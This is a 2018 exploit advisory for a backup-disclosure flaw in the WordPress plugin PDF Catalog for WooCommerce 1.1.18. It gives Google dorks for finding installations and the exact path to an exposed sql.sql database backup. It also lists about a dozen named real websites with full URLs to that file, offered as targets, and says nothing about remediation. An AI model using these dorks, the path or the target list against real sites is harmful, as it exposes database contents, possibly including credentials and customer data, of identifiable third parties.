################################################################################################# # Exploit Title : WordPress PDF Catalog for WooCommerce Plugins 1.1.18 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/12/2018 # Vendor Homepage : ovologics.com ~ wordpress.org/plugins/pdf-catalog-for-woocommerce/ # Software Download Link : downloads.wordpress.org/plugin/pdf-catalog-for-woocommerce.zip + codecanyon.net/item/pdf-product-catalog-for-woocommerce/7874949 + github.com/wp-plugins/pdf-catalog-for-woocommerce # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.1.18 # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/pdf-catalog-for-woocommerce/'' + intext:''Developed by PMS (PVT). LTD'' + intext:''Developed by Jasa SEO Bandung'' + intext:''A(c) 2017 Copyright mian junaid'' + intext:''Powered by WebSmart'' site:za # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/plugins/pdf-catalog-for-woocommerce/pdf_data/templates/Additional%20service/sql.sql ################################################################################################# # Example Vulnerable Sites => [+] mitmark.com.br/brindesangola/wp-content/plugins/pdf-catalog-for-woocommerce/pdf_data/templates/Additional%20service/sql.sql [+] abidisurgicalinstruments.com/wp-content/plugins/pdf-catalog-for-woocommerce/pdf_data/templates/Additional%20service/sql.sql [+] arabskaya-parfyumeriya.ru/wp-content/plugins/pdf-catalog-for-woocommerce/pdf_data/templates/Additional%20service/sql.sql [+] souvenirmoment.com/wp-content/plugins/pdf-catalog-for-woocommerce/pdf_data/templates/Additional%20service/sql.sql [+] abidisurgicalinstruments.com/wp-content/plugins/pdf-catalog-for-woocommerce/pdf_data/templates/Additional%20service/sql.sql [+] onegang.co.uk/wp-content/plugins/pdf-catalog-for-woocommerce/pdf_data/templates/Additional%20service/sql.sql [+] silverspoonhire.co.za/wp-content/plugins/pdf-catalog-for-woocommerce/pdf_data/templates/Additional%20service/sql.sql [+] yoursewingstoreonline.com/wp-content/plugins/pdf-catalog-for-woocommerce/pdf_data/templates/Additional%20service/sql.sql [+] skfans.com.pk/wp-content/plugins/pdf-catalog-for-woocommerce/pdf_data/templates/Additional%20service/sql.sql [+] mahamayapublications.com/wp-content/plugins/pdf-catalog-for-woocommerce/pdf_data/templates/Additional%20service/sql.sql [+] citraintisempurna.com/wp-content/plugins/pdf-catalog-for-woocommerce/pdf_data/templates/Additional%20service/sql.sql [+] sabresafety.com.br/novo//wp-content/plugins/pdf-catalog-for-woocommerce/pdf_data/templates/Additional%20service/sql.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################